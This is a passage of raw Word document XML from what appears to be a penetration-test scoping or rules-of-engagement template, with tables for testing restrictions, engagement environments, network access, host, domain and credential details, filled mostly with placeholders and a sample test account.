      <w:tr w:rsidR="00112BBC" w14:paraId="0C127095" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00B0F0"/>
          </w:tcPr>
          <w:p w14:paraId="6247CC51" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="004140D3" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r w:rsidRPr="004140D3">
              <w:t>Exclude Critical Services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77762FBD" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="004140D3" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r w:rsidRPr="004140D3">
              <w:t>Specifies any critical services that will not be tested to avoid disruption.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="777281B1" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00B0F0"/>
          </w:tcPr>
          <w:p w14:paraId="3A75AE9D" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="004140D3" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r w:rsidRPr="004140D3">
              <w:t>Time Restrictions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FB89680" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="004140D3" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r w:rsidRPr="004140D3">
              <w:t>Indicates specific times or periods when testing should not be conducted to minimize impact.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="259766CE" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00B0F0"/>
          </w:tcPr>
          <w:p w14:paraId="7EE6514B" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="004140D3" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r w:rsidRPr="004140D3">
              <w:t>Data Sensitivity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64C99CF6" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="004140D3" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r w:rsidRPr="004140D3">
              <w:t>Outlines any restrictions related to the handling of sensitive or proprietary data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="36A19D5E" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00B0F0"/>
          </w:tcPr>
          <w:p w14:paraId="3C4FB3B8" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="004140D3" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r w:rsidRPr="004140D3">
              <w:t>Access Limitations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58AE6D3D" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="004140D3" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r w:rsidRPr="004140D3">
              <w:t>Details any access controls or limitations imposed on testers to prevent unintended access.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="711F01AD" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="006B12F7" w:rsidRDefault="00112BBC" w:rsidP="00112BBC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="engagement-environment"/>
      <w:bookmarkStart w:id="44" w:name="_Toc178498970"/>
      <w:bookmarkEnd w:id="41"/>
      <w:r w:rsidRPr="006B12F7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Engagement Environment</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w14:paraId="4D904494" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="004565AB" w:rsidRDefault="00112BBC" w:rsidP="00112BBC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32A3CFFC" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="001937A8" w:rsidRDefault="00112BBC" w:rsidP="00112BBC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pP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69"/>
        <w:gridCol w:w="7781"/>
      </w:tblGrid>
      <w:tr w:rsidR="00112BBC" w14:paraId="23C734C8" w14:textId="77777777" w:rsidTr="00EA00E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shd w:val="clear" w:color="auto" w:fill="00B0F0"/>
          </w:tcPr>
          <w:p w14:paraId="516ED7CE" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2459CAD6" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="67D17464" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00B0F0"/>
          </w:tcPr>
          <w:p w14:paraId="2C40A99C" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Production</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47B78E0D" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Testing occurs in the live environment used by end-users.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="7FE738AB" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00B0F0"/>
          </w:tcPr>
          <w:p w14:paraId="696B2134" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Staging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DE5B1EA" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Testing occurs in a pre-production environment </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>similar to</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> production.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="51782CF0" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00B0F0"/>
          </w:tcPr>
          <w:p w14:paraId="6475F014" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Isolated</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B882821" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Testing occurs in </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>a completely separate</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> environment with no impact on live systems.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="419D3513" w14:textId="3245DAB7" w:rsidR="00112BBC" w:rsidRPr="000E6213" w:rsidRDefault="00112BBC" w:rsidP="000479B0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="engagement-access-permissions-and-tools"/>
      <w:bookmarkStart w:id="46" w:name="_Toc178498971"/>
      <w:bookmarkEnd w:id="36"/>
      <w:bookmarkEnd w:id="43"/>
      <w:r w:rsidRPr="000E6213">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Engagement Access Permissions and Tools</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w14:paraId="141E7AF4" w14:textId="6A137D05" w:rsidR="00333838" w:rsidRPr="00333838" w:rsidRDefault="00112BBC" w:rsidP="00371C54">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="access-permissions"/>
      <w:bookmarkStart w:id="48" w:name="_Toc178498972"/>
      <w:r>
        <w:t>Access Permissions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>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811"/>
        <w:gridCol w:w="7539"/>
      </w:tblGrid>
      <w:tr w:rsidR="007826FC" w14:paraId="5AC1E7C9" w14:textId="77777777" w:rsidTr="00EA00E3">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00B0F0"/>
          </w:tcPr>
          <w:p w14:paraId="61B66A44" w14:textId="11743CF9" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00AD75DC">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:spacing w:line="720" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Network</w:t>
            </w:r>
            <w:r w:rsidR="00AD75DC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="264B811F" w14:textId="77777777" w:rsidR="00371C54" w:rsidRDefault="00112BBC" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="24"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Internal Network Access</w:t>
            </w:r>
            <w:r>
              <w:t>: Provided/Not Provided via VPN, Direct Connection, Internal Service (e.g., File Share, Intranet)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AC1F6BD" w14:textId="77777777" w:rsidR="00371C54" w:rsidRDefault="00371C54" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="24"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>VPN Connection</w:t>
            </w:r>
            <w:r>
              <w:t>: Allowed/Not Allowed</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EDADDF5" w14:textId="77777777" w:rsidR="00371C54" w:rsidRDefault="00371C54" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="24"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00371C54">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>VPN IP Address</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: [Insert VPN IP Address] </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B2FB216" w14:textId="77777777" w:rsidR="00371C54" w:rsidRDefault="00371C54" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="24"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00371C54">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Direct Access</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: Allowed/Not Allowed </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29FDD797" w14:textId="7D6C9F7E" w:rsidR="00371C54" w:rsidRDefault="00371C54" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="24"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00371C54">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Other Connection Methods</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: RDP, SSH, VNC, SFTP, HTTP, HTTPS, or Custom Protocol </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36D377B0" w14:textId="0A448A62" w:rsidR="00BD774D" w:rsidRDefault="00112BBC" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="23"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FC5CE46" w14:textId="2D3073B3" w:rsidR="00BD774D" w:rsidRDefault="00112BBC" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="23"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>External Connection</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: Allowed/Not Allowed via External IPs 111.111.54.1 through Public Internet  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A65E643" w14:textId="03C17583" w:rsidR="009A36FD" w:rsidRDefault="00112BBC" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="23"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Port Allowance</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: Specific Ports (e.g., 22, 80, 443, 3389) or Unrestricted Access  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E179BD4" w14:textId="2246766D" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="23"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Cloud Access</w:t>
            </w:r>
            <w:r>
              <w:t>: Provided via AWS, Azure, Google Cloud, Private Cloud</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007826FC" w14:paraId="62259874" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00B0F0"/>
          </w:tcPr>
          <w:p w14:paraId="5BE5E6B4" w14:textId="768A3ABA" w:rsidR="00112BBC" w:rsidRDefault="009A36FD" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">PT </w:t>
            </w:r>
            <w:r w:rsidR="00112BBC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Host Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37C2868C" w14:textId="77777777" w:rsidR="009A36FD" w:rsidRDefault="00112BBC" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Hostname</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: [Insert Hostname] </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16A1BA51" w14:textId="77777777" w:rsidR="009A36FD" w:rsidRDefault="00112BBC" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Operating System</w:t>
            </w:r>
            <w:r>
              <w:t>: Windows/Linux/MacOS/Other</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26C11D54" w14:textId="77777777" w:rsidR="009A36FD" w:rsidRDefault="00112BBC" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Version</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: [Insert OS Version] </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BA07D9B" w14:textId="77777777" w:rsidR="009A36FD" w:rsidRDefault="00112BBC" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Network Configuration</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: Static IP/DHCP </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20A7AF43" w14:textId="53441481" w:rsidR="009A36FD" w:rsidRDefault="00112BBC" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Firewall Status</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: Enabled/Disabled/Custom Rules Applied </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DD07BAF" w14:textId="4E2C9D9F" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Patch Level</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>Up-to-date</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>/Outdated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007826FC" w14:paraId="3F3B661F" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00B0F0"/>
          </w:tcPr>
          <w:p w14:paraId="5756769A" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Domain Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F1AB6A2" w14:textId="073C8F2D" w:rsidR="00DD6785" w:rsidRDefault="00112BBC" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Domain Status</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: Joined/Not Joined </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DB28884" w14:textId="77777777" w:rsidR="00DD6785" w:rsidRDefault="00112BBC" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Domain Name</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: [Insert Domain Name] </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B10D155" w14:textId="7A843A03" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Domain Controller Access</w:t>
            </w:r>
            <w:r>
              <w:t>: Provided/Not Provided</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007826FC" w14:paraId="593BE834" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00B0F0"/>
          </w:tcPr>
          <w:p w14:paraId="0ABD912B" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46C595F1" w14:textId="247BA5B0" w:rsidR="00ED3605" w:rsidRDefault="00112BBC" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Credentials Provided</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: Yes/No </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CE8CBE2" w14:textId="77777777" w:rsidR="00ED3605" w:rsidRDefault="00112BBC" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Access Level</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: Admin/User/Service Account/Root/Read-only </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="102D8AE6" w14:textId="448679F5" w:rsidR="00ED3605" w:rsidRDefault="00112BBC" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Authentication Method</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: Password, Multi-Factor Authentication (MFA), Certificate-Based, Biometric, Key-Based, OAuth </w:t>
            </w:r>
            <w:r w:rsidR="00ED3605">
              <w:t>–</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2576CA4E" w14:textId="49E2784A" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Key-Based Access</w:t>
            </w:r>
            <w:r>
              <w:t>: SSH Keys, API Keys Provided/Not Provided</w:t>
            </w:r>
            <w:r w:rsidR="007826FC">
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="007826FC">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
              <w:t>Castomer</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="007826FC">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
              <w:t xml:space="preserve"> Account </w:t>
            </w:r>
            <w:r w:rsidR="007826FC" w:rsidRPr="1F04327A">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
              <w:t xml:space="preserve">(testuser@example.com) A fake customer account in the XXXX application for testing functionality that requires authentication.  </w:t>
            </w:r>
            <w:r w:rsidR="00F2169F">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00F2169F">
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
